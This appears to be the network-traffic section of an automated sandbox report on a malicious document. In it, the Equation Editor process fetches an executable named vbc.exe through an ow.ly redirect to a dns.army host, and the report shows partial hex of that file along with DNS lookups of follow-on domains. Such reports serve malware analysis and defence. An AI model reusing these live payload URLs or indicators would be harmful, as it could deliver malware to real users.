Feb 23, 2021 11:34:29.199678898 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199697018 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199722052 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.199740887 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.199781895 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.200217962 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.200896025 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.200943947 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.200973988 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.200998068 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201081038 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201122046 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201149940 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201169014 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201503992 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201556921 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201574087 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201601982 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201632023 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201642990 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201672077 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201683998 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201684952 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201726913 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201745987 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201766968 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201786041 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201807976 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201816082 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201848030 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201878071 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201896906 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201896906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201941967 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201961994 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.201982021 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.201998949 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.202025890 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.202053070 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.202061892 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.202065945 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.202106953 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.202131033 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.202136993 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:29.202152014 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.202205896 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.210953951 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:29.703983068 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:35:30.453217030 CET	49167	80	192.168.2.22	52.58.78.16
Feb 23, 2021 11:35:30.494446039 CET	80	49167	52.58.78.16	192.168.2.22
Feb 23, 2021 11:35:30.494594097 CET	49167	80	192.168.2.22	52.58.78.16
Feb 23, 2021 11:35:30.494999886 CET	49167	80	192.168.2.22	52.58.78.16
Feb 23, 2021 11:35:30.535988092 CET	80	49167	52.58.78.16	192.168.2.22
Feb 23, 2021 11:35:30.536180973 CET	80	49167	52.58.78.16	192.168.2.22
Feb 23, 2021 11:35:30.536211014 CET	80	49167	52.58.78.16	192.168.2.22
Feb 23, 2021 11:35:30.536454916 CET	49167	80	192.168.2.22	52.58.78.16
Feb 23, 2021 11:35:30.536528111 CET	49167	80	192.168.2.22	52.58.78.16
Feb 23, 2021 11:35:30.577496052 CET	80	49167	52.58.78.16	192.168.2.22
Feb 23, 2021 11:35:49.132376909 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.174977064 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.175136089 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.175415039 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.216588020 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302113056 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302167892 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302207947 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302248001 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302287102 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302318096 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.302339077 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302375078 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.302383900 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302427053 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302457094 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.302467108 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302508116 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.302537918 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.343543053 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.343600988 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.343724966 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.344858885 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.344904900 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.345010996 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.347773075 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.347816944 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.347894907 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.350682974 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.350733042 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.350816011 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.353543043 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.353584051 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.353656054 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.358004093 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.358058929 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.358170033 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.360529900 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.360572100 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.360666990 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.362608910 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.362653971 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.362737894 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.365163088 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.365219116 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.365314007 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.385313988 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.385380030 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.385571957 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.386771917 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.386826992 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.387012959 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.392915964 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.392966986 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.393100023 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.393788099 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.393831015 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.393910885 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.396234989 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.396269083 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.396605015 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.396733999 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.442998886 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.567694902 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.567759037 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.568136930 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.568152905 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.568193913 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.568198919 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.568258047 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.568274021 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.569700003 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.569758892 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.569933891 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.569983959 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.571116924 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.571163893 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.571268082 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.571319103 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.572614908 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.572654963 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.572753906 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.572803020 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.574151993 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.574196100 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.574244976 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.574273109 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.575619936 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.575661898 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.577145100 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.577188015 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.578644991 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.578686953 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.578917027 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.578952074 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.578958035 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.578963041 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.580158949 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.580209017 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.580276012 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.580331087 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.581681013 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.581726074 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.583179951 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.583225012 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.584681988 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.584724903 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.586184978 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.586230040 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.587709904 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.587754965 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.589221954 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.589279890 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.590728045 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.590774059 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.591586113 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591623068 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591630936 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591636896 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591644049 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591650009 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591655016 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591661930 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591666937 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591674089 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591680050 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591685057 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591691017 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591696978 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591702938 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.591708899 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.592231035 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.592287064 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.592478037 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.592566967 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.593732119 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.593775988 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.593826056 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.593849897 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.595247984 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.595294952 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.595346928 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.595371008 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.596765995 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.596817017 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.596859932 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.596885920 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.598242998 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.598294020 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.598335981 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.598360062 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.599797964 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.599848986 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.599889040 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.599914074 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.601277113 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.601331949 CET	80	49168	216.239.32.21	192.168.2.22
Feb 23, 2021 11:35:49.601375103 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:35:49.601399899 CET	49168	80	192.168.2.22	216.239.32.21
Feb 23, 2021 11:36:09.636902094 CET	49169	80	192.168.2.22	34.102.136.180
Feb 23, 2021 11:36:09.677853107 CET	80	49169	34.102.136.180	192.168.2.22
Feb 23, 2021 11:36:09.678040981 CET	49169	80	192.168.2.22	34.102.136.180
Feb 23, 2021 11:36:09.678211927 CET	49169	80	192.168.2.22	34.102.136.180
Feb 23, 2021 11:36:09.720371962 CET	80	49169	34.102.136.180	192.168.2.22
Feb 23, 2021 11:36:09.818981886 CET	80	49169	34.102.136.180	192.168.2.22
Feb 23, 2021 11:36:09.819031000 CET	80	49169	34.102.136.180	192.168.2.22
Feb 23, 2021 11:36:09.819303989 CET	49169	80	192.168.2.22	34.102.136.180
Feb 23, 2021 11:36:09.819356918 CET	49169	80	192.168.2.22	34.102.136.180
Feb 23, 2021 11:36:09.860923052 CET	80	49169	34.102.136.180	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:34:26.501152992 CET	52197	53	192.168.2.22	8.8.8.8
Feb 23, 2021 11:34:26.558443069 CET	53	52197	8.8.8.8	192.168.2.22
Feb 23, 2021 11:34:27.022183895 CET	53099	53	192.168.2.22	8.8.8.8
Feb 23, 2021 11:34:27.113754988 CET	53	53099	8.8.8.8	192.168.2.22
Feb 23, 2021 11:34:27.114170074 CET	53099	53	192.168.2.22	8.8.8.8
Feb 23, 2021 11:34:27.174151897 CET	53	53099	8.8.8.8	192.168.2.22
Feb 23, 2021 11:35:30.375346899 CET	52838	53	192.168.2.22	8.8.8.8
Feb 23, 2021 11:35:30.437100887 CET	53	52838	8.8.8.8	192.168.2.22
Feb 23, 2021 11:35:49.047370911 CET	61200	53	192.168.2.22	8.8.8.8
Feb 23, 2021 11:35:49.129951954 CET	53	61200	8.8.8.8	192.168.2.22
Feb 23, 2021 11:36:09.559489012 CET	49548	53	192.168.2.22	8.8.8.8
Feb 23, 2021 11:36:09.635488987 CET	53	49548	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 11:34:26.501152992 CET	192.168.2.22	8.8.8.8	0x887e	Standard query (0)	ow.ly	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:27.022183895 CET	192.168.2.22	8.8.8.8	0xdd2a	Standard query (0)	msnsndstdyyemkemafgk.dns.army	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:27.114170074 CET	192.168.2.22	8.8.8.8	0xdd2a	Standard query (0)	msnsndstdyyemkemafgk.dns.army	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:30.375346899 CET	192.168.2.22	8.8.8.8	0x708c	Standard query (0)	www.priority1fleet.com	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:49.047370911 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.quallateematerial.com	A (IP address)	IN (0x0001)
Feb 23, 2021 11:36:09.559489012 CET	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.hattonpalacejewellery.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 11:34:26.558443069 CET	8.8.8.8	192.168.2.22	0x887e	No error (0)	ow.ly		54.67.62.204	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:26.558443069 CET	8.8.8.8	192.168.2.22	0x887e	No error (0)	ow.ly		54.183.132.164	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:26.558443069 CET	8.8.8.8	192.168.2.22	0x887e	No error (0)	ow.ly		54.67.120.65	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:26.558443069 CET	8.8.8.8	192.168.2.22	0x887e	No error (0)	ow.ly		54.67.57.56	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:26.558443069 CET	8.8.8.8	192.168.2.22	0x887e	No error (0)	ow.ly		54.183.131.91	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:27.113754988 CET	8.8.8.8	192.168.2.22	0xdd2a	No error (0)	msnsndstdyyemkemafgk.dns.army		180.214.238.131	A (IP address)	IN (0x0001)
Feb 23, 2021 11:34:27.174151897 CET	8.8.8.8	192.168.2.22	0xdd2a	No error (0)	msnsndstdyyemkemafgk.dns.army		180.214.238.131	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:30.437100887 CET	8.8.8.8	192.168.2.22	0x708c	No error (0)	www.priority1fleet.com		52.58.78.16	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:49.129951954 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.quallateematerial.com		216.239.32.21	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:49.129951954 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.quallateematerial.com		216.239.36.21	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:49.129951954 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.quallateematerial.com		216.239.38.21	A (IP address)	IN (0x0001)
Feb 23, 2021 11:35:49.129951954 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.quallateematerial.com		216.239.34.21	A (IP address)	IN (0x0001)
Feb 23, 2021 11:36:09.635488987 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	www.hattonpalacejewellery.com	hattonpalacejewellery.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 11:36:09.635488987 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	hattonpalacejewellery.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ow.ly

msnsndstdyyemkemafgk.dns.army

www.priority1fleet.com

www.quallateematerial.com

www.hattonpalacejewellery.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	54.67.62.204	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:34:26.784049988 CET	0	OUT	GET /8O6j30rxT69 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ow.ly Connection: Keep-Alive
Feb 23, 2021 11:34:26.999011993 CET	1	IN	HTTP/1.1 301 Moved Permanently Location: http://msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?platform=hootsuite Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Date: Tue, 23 Feb 2021 10:34:26 GMT Connection: close Content-Length: 0 X-Pool: owly_web

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	180.214.238.131	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:34:27.401906013 CET	2	OUT	GET /receipst/vbc.exe?platform=hootsuite HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: msnsndstdyyemkemafgk.dns.army
Feb 23, 2021 11:34:27.626671076 CET	3	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 10:34:27 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34 Last-Modified: Tue, 23 Feb 2021 06:43:59 GMT ETag: "a7e00-5bbfb3e41a257" Accept-Ranges: bytes Content-Length: 687616 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 a3 34 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 0a 00 00 08 00 00 00 00 00 00 da 93 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 93 0a 00 4f 00 00 00 00 a0 0a 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 73 0a 00 00 20 00 00 00 74 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 a0 0a 00 00 06 00 00 00 76 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 93 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 5b 01 00 84 e8 01 00 03 00 00 00 d4 00 00 06 b0 43 03 00 d8 4f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 07 00 00 06 00 02 7b 09 00 00 04 72 01 00 00 70 7e 2f 00 00 04 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 06 00 00 04 6f 18 00 00 0a 26 2a 00 1b 30 01 00 